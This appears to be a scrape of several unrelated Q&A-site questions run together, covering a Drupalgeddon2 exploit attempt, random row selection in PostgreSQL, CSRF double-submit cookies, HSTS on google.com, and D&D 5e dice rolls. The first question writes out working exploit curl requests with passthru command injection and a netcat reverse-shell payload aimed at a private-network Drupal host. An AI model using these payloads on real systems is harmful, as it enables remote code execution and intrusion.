Sending a reverse shell command through the drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on drupal 7.57 ubuntu machine.

the requests:

-curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \ --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id .  -curl -k -i "http://192.168.204.141/?q=file/ajax/name/%23value/$  {form_build_id}" \ --data "form_build_id=$  {form_build_id}". 

execute along with any other command (ls,cd…) and print a result.

but when I send the curl request:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=nc-e/bin/sh 192.168.204.128 5555'--data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id . 

It doesn’t print anything (form_build_id) not even an error, and the target doesn’t connect to handler. where do you think is the problem?

I have tried other payloads, and they result in the same things.

What is the correct way of grabbing a RANDOM record from a PostgreSQL table, which isn’t painfully slow or not-random?

I always used to do:

SELECT column FROM table ORDER BY random() LIMIT 1; 

For large tables, this was unbearably, impossibly slow, to the point of being useless in practice. That’s why I started hunting for more efficient methods. People recommended:

SELECT column FROM table TABLESAMPLE BERNOULLI(1) LIMIT 1; 

While fast, it also provides worthless randomness. It appears to always pick the same damn records, so this is also worthless.

I’ve also tried:

SELECT column FROM table TABLESAMPLE BERNOULLI(100) LIMIT 1; 

It gives even worse randomness. It picks the same few records every time. This is completely worthless. I need actual randomness.

Why is it apparently so difficult to just pick a random record? Why does it have to grab EVERY record and then sort them (in the first case)? And why do the “TABLESAMPLE” versions just grab the same stupid records all the time? Why aren’t they random whatsoever? Who would ever want to use this “BERNOULLI” stuff when it just picks the same few records over and over? I can’t believe I’m still, after all these years, asking about grabbing a random record… it’s one of the most basic possible queries.

What is the actual command to use for grabbing a random record from a table in PG which isn’t so slow that it takes several full seconds for a decent-sized table?

for anti-CSRF, isn’t a session id cookie in a hidden form field easier than a random token?

I sometimes run into sites with CSRF bugs and I want to know the simplest way to recommend for the developer to fix it. (i.e., if I tell them “Switch to a framework that has anti-CSRF protection”, they won’t listen.)

Anecdotally, it looks like most sites mitigate CSRF by including a random token as a hidden form field, and then rejecting the form submission of the token isn’t present. (And it usually looks hand-crafted, not inserted by the framework.)

I’m wondering why it isn’t much simpler (and hence, much more common practice) to do “double-submit cookie” — where you take the session id cookie and put it in a hidden form field, and then reject the form submission if the hidden field value doesn’t match the session id cookie.

First, the problems with the “random token” approach, if your framework doesn’t have it built-in: You have to generate a random value and store it server-side, and in your storage table it must be associated with the user it was served to. When the form is posted, you have to check that the value is there, check it’s associated with the logged-in user, and then delete it so it can’t be re-used. If you screw up any part of this, you’ve potentially created a security hole. And, you might need to create a new database table for your tokens, which is just more cruft. (Yes, I know you can do it using hashes and secret values, but that’s also error-prone.)

By contrast, consider the ease of using the session cookie. (You don’t want to use an authentication cookie, because if the authentication cookie is stored in a hidden form field, an xss bug might be able to read it. But session-id cookie is probably safe.) ALL you have to do is store it in a hidden form field, and then check the value when the form is submitted.

So, I contend that IF the website in question has a framework that uses session cookies, I can tell them that the easiest way to fix it is by using double-submit-cookie with the “session-id” cookie, and to ignore all the webpages which usually start out by talking about how to protection against CSRF by using random tokens.

Am I missing something? Does double-submit-cookie have some disadvantage?

isn’t it a security gap if TLD hostname doesn’t send the strict-transport-security header?

If you connect to https://google.com (without www.) you get a HTTP 301 redirect to https://www.google.com/ . Then if you connect to https://www.google.com/ the response includes the strict-transport-security header.

I contend this is a (small) security gap, because the strict-transport-security attribute never gets set for the top-level hostname, google.com. This means that no matter how many times the user has connected to google.com or www.google.com, if an attacker manages to send them to http://google.com/ , and the attacker is a man-in-the-middle who can redirect google.com to a site the attacker controls, they can eavesdrop on the connection. (Also, Google’s entry on the HSTS preload list only applies to www.google.com, not google.com.)

However, Google is rejecting all reports of “security holes” regarding HSTS: https://sites.google.com/site/bughunteruniversity/nonvuln/lack-of-hsts with the statement “Migrating all the domains to HTTPS, and deprecating all clients that can only talk over plaintext HTTP takes time.”

I contend these objections makes no sense. If a client only speaks http, then the way to continue supporting that client is to continue serving http. But if you serve the STS header over https connections, you’re telling the client, “Hey client, since you obviously speak https, this host promises it will always serve you https in the future and you should always make https requests to me.” The only valid reason not to serve the STS header would be if you think the hostname might some day not support https any more, which is hopefully not the case for google.com!

Perhaps there are subdomains of google.com that don’t support https. But then google.com can just serve the STS header without the “includeSubDomains” attribute, so it won’t be applied to subdomains.

So I maintain that: 1) Not serving the STS header for the hostname google.com is a security gap. While it’s a small gap, there is no offsetting legitimate reason not to serve the header. 2) It is not a valid objection that they “want to keep supporting clients that only talk over plaintext HTTP”. 3) It is not a valid objection that they have not migrated other subdomains to https yet.

Am I missing something?

Do characters know they did a poor job if the result of a dice roll isn’t automatically obvious?

During a discussion I had with @jgn based on the question discussing rolling twice on an investigation check, I realized we were operating with entirely different ideas of how dice rolls actually function inside of the narrative of the game.

For example:

A fighter searches a room he’s never been in before. If he rolls a 15, he’ll find the hidden switch that opens the secret laboratory of the mad doctor Fred. He rolls and its a 3, he does not find the secret switch.

My point of view is that the fighter did his best to find something special about the room, didn’t find anything, and has no reason to roll again, and he’d get a new try, or find it automatically, if somebody later informed him about the hidden switch in the room.

@jgn’s point of view is that the fighter is aware of the fact that he did a poor job searching the room and can keep trying until he is confident that he did a good job. In essence, the fighter “knows” the dice roll and will stop trying when he rolls high enough.

To me, the later approach seems like it’d be better served with a taking 10 (passive) Investigation check and refluffing “oh I rolled a 1, I did a poor job searching, I’ll roll again!” is essentially fishing for advantage based on meta game information.

In earlier editions, “try until you are 100% certain you gave it your best” was done with taking 20, but that no longer exists in 5e.

So which, exactly, is the official D&D 5e stance?

Do characters know they did a poor job because of low dice rolls if a failed roll gives them no new information?